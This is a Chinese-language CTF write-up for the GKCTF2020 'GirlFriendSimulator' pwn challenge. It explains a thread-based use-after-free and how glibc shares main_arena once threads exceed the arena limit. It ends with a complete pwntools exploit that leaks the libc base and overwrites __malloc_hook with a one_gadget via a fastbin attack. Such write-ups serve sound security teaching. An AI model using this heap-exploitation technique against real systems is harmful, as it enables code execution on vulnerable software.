线程PWN之gkctf2020 GirlFriendSimulator

线程PWN之gkctf2020 GirlFriendSimulator

首先，检查一下程序的保护机制

然后我们用IDA分析一下，一个多线程程序

在线程里的delete功能，存在UAF

但是由于add功能次数限制，无法在线程里完成这个UAF的利用

在glibc中，线程有自己的arena，但是arena的个数是有限的，一般跟处理器核心个数有关，假如线程个数超过arena总个数，并且执行线程都在使用，那么该怎么办呢。Glibc会遍历所有的arena，首先是从主线程的main_arena开始，尝试lock该arena，如果成功lock，那么就把这个arena给线程使用。

为了测试有多少个arena，我们写如下脚本

for i in range(num - 1):

   add(0x10,'a'*0x10)

   delete()

   add(0x10,'a'*0x8)

   show()

   sh.recvuntil('a'*0x8)

   heap_addr = u64(sh.recv(6).ljust(8,'\x00'))

   print 'heap_addr=',hex(heap_addr)

   nextThread()

我们看到，第9个，其堆地址跟main_arena管理的堆地址相似，可以推断出，该线程使用了main_arena。因此，我们在第9个线程里，利用delete功能制造UAF，然后，在main函数后面的流程中，

可以直接编辑最后一个线程创建的堆，也就是可以把fake_chunk链接到bin上，从而利用fastbin attack。

#coding:utf8
from pwn import *

#sh = process('./girlfriend_simulator')
sh = remote('node3.buuoj.cn',25877)
libc = ELF('./libc-2.23.so')
num = 9
sh.sendlineafter('How much girlfriend you want ?',str(num))

def add(size,content):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('size?',str(size))
   sh.sendafter('content:',content)

def delete():
   sh.sendlineafter('>>','2')

def show():
   sh.sendlineafter('>>','3')

def nextThread():
   sh.sendlineafter('>>','5')

for i in range(num - 1):
   add(0x10,'a'*0x10)
   delete()
   add(0x10,'a'*0x8)
   show()
   sh.recvuntil('a'*0x8)
   heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
   print 'heap_addr=',hex(heap_addr)
   nextThread()
#这个线程将使用主线程的main_arena，由此在主线程的堆里制造一个UAF
add(0x60,'a'*0x60)
delete()
nextThread()

sh.recvuntil('wife:0x')
libc_base = int(sh.recv(12),16) - libc.sym['_IO_2_1_stdout_']
malloc_hook_addr = libc_base + libc.sym['__malloc_hook']
one_gadget_addr = libc_base + 0x4526a
realloc_addr = libc_base + libc.sym['realloc']
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'realloc_addr=',hex(realloc_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)
sh.sendlineafter('say something to impress your girlfriend',p64(malloc_hook_addr - 0x23))
sh.sendlineafter('your girlfriend is moved by your words','I love you')
#改写malloc_hook
payload = '\x00'*0xB + p64(one_gadget_addr) + p64(realloc_addr + 0x2)
sh.sendlineafter('Questionnaire',payload)

sh.interactive()